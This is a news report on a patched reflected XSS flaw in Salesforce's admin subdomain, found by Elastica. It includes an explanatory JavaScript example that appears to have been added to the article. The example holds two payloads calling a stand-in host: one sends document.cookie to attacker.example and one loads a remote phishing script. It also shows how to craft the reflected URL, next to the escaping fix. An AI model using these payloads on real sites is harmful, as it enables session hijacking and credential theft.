Salesforce.com has patched a cross-site scripting (XSS) flaw in a subdomain which could have been exploited by hackers to hijack accounts or distribute malware.
The vulnerability in “admin.salesforce.com” could affect Salesforce accounts across its various apps, because the SaaS pioneer uses single sign-on (SSO) to manage multiple accounts, according to Elastica Cloud Threat Labs.
The company explained in a blog post:
“This subdomain was vulnerable to a reflected Cross-site Scripting (XSS) vulnerability where a specific function in the deployed application failed to sanitize and filter the arbitrary input passed by the remote user as a part of an HTTP request. As a result, the attacker could have executed JavaScript in the context of the application, thereby impacting the privacy and security of Salesforce users.”
There are three main ways that the flaw could be exploited, according to the firm.
The first could allow for account takeover if an attacker executes JavaScript to steal cookies and session identifiers.
Another involves the attacker forcing Salesforce users to visit phishing sites, or injecting pop-up windows designed for the same purpose.
Finally, a hacker could exploit the XSS flaw to force users to download malicious code on their machines by “executing unauthorized scripts in the context of the browser running a vulnerable application.”
Elastica validated one of these scenarios, demonstrating how easy it is to author a fake log-in pop-up designed to harvest a user’s credentials.
It explained further:
“Since we are able to inject JavaScripts from a remote location, it becomes quite easy to inject a pop-up in the primary webpage of the vulnerable application. We hosted the JavaScript on a third-party domain and passed it as a part of an injected JavaScript.”
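To make the reflected XSS described above and the first two exploitation scenarios concrete, here is an added example (not Salesforce's code, nor Elastica's proof of concept): a request parameter echoed into a page without escaping, beside the hardened version, and the two payloads the scenarios depend on. The page template, the parameter name `q`, and the hosts `vulnerable.example` and `attacker.example` are assumptions chosen for illustration.

```javascript
// Added example: a minimal model of a reflected XSS bug (an HTTP parameter
// echoed into a page without escaping) beside its hardened form, plus the
// two attacker payloads the scenarios rely on. Nothing here is Salesforce's
// code; the page template, the parameter name "q" and the hosts
// vulnerable.example / attacker.example are assumptions for illustration.

// Vulnerable: the "search term" from the request is concatenated straight
// into HTML, so markup in the parameter becomes markup in the page.
function renderVulnerable(query) {
  return '<html><body><h1>Results for: ' + query + '</h1></body></html>';
}

// Hardened: escape the five characters that let text break out of an HTML
// text node or attribute before the value is placed in the document.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderSafe(query) {
  return '<html><body><h1>Results for: ' + escapeHtml(query) + '</h1></body></html>';
}

// Scenario 1 (account takeover): script that ships document.cookie to the
// attacker. Only cookies set without the HttpOnly flag are readable this way.
const COOKIE_THEFT_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"+encodeURIComponent(document.cookie)</script>';

// Scenario 2 (phishing pop-up), in the shape Elastica describes: the injected
// tag merely loads a script hosted on a third-party domain, and that remote
// script draws the fake login dialog over the real page.
const REMOTE_SCRIPT_PAYLOAD =
  '<script src="https://attacker.example/login-popup.js"></script>';

// How many real <script> elements the rendered page contains: one in the
// vulnerable page, none in the hardened one (the tag survives only as text).
function countScriptTags(html) {
  return (html.match(/<script[\s>]/gi) || []).length;
}

// The link a victim would be sent: the payload rides in the URL, so the
// attacker never needs to store anything on the server.
function craftReflectedUrl(base, payload) {
  return base + '?q=' + encodeURIComponent(payload);
}

// Recover the parameter exactly as the server-side handler would see it.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name);
}

function demo() {
  const url = craftReflectedUrl('https://vulnerable.example/search', REMOTE_SCRIPT_PAYLOAD);
  const q = queryParam(url, 'q');
  return {
    vulnerableScripts: countScriptTags(renderVulnerable(q)),
    safeScripts: countScriptTags(renderSafe(q)),
    safeHtml: renderSafe(q),
  };
}
```

Two caveats a practitioner would check before rating such a bug "low impact": the cookie-theft payload only works against session cookies that lack the HttpOnly flag, and a cookie scoped to the parent domain is readable from any subdomain, which is why a flaw on admin.salesforce.com can matter to users who never visit it. Output encoding as in `renderSafe` is the fix; a Content Security Policy that blocks inline and third-party scripts is the defence in depth that would also have neutralised the remote-script payload.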
Salesforce.com has now patched this vulnerability after being first informed of it by Elastica over a month ago.
“According to Salesforce, the impact is low because only selected users can be targeted,” Elastica explained. “However, we believe that this vulnerability has the potential to be exploited in the wild as shown in the earlier PoC, which could lead to potential account takeover since the primary domain is ‘salesforce.com’.”
Writing on the Tripwire blog, security consultant Graham Cluley welcomed the SaaS giant’s proactive stance.
“That’s a much better approach than putting your head in the sand, and hoping the problem will go away, or claiming that the threat is not serious or has not yet been exploited,” he argued.